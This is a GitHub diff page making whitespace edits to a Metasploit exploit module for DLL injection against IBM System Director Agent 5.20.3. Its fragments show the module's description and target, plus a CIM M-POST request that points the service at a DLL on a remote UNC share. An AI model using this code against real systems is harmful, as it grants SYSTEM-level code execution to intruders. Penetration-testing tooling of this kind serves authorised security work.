File tree Expand file tree Collapse file tree 1 file changed +3
-3
lines changed
modules/exploits/windows/misc Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
16
16
17
17
def initialize
18
18
super (
19
- 'Name' => 'IBM System Director Agent DLL Injection' ,
19
+ 'Name' => 'IBM System Director Agent DLL Injection' ,
20
20
'Description' => %q{
21
21
This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3
22
22
to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM
@@ -44,7 +44,7 @@ def initialize
44
44
] ,
45
45
'Targets' =>
46
46
[
47
- [ 'IBM System Director Agent 5.20.3 / Windows with WebClient enabled' , { } ] ,
47
+ [ 'IBM System Director Agent 5.20.3 / Windows with WebClient enabled' , { } ]
48
48
] ,
49
49
'DefaultTarget' => 0 ,
50
50
'Privileged' => true ,
@@ -299,7 +299,7 @@ def primer
299
299
'uri' => "/CIMListener/#{ exploit_unc } #{ share_name } \\ #{ basename } .dll" ,
300
300
'method' => 'M-POST' ,
301
301
'ctype' => 'application/xml; charset=utf-8' ,
302
- 'headers' => {
302
+ 'headers' => {
303
303
"Man" => "http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40" ,
304
304
"CIMOperation" => "MethodCall" ,
305
305
"CIMExport" => "MethodRequest" ,
You can’t perform that action at this time.
0 commit comments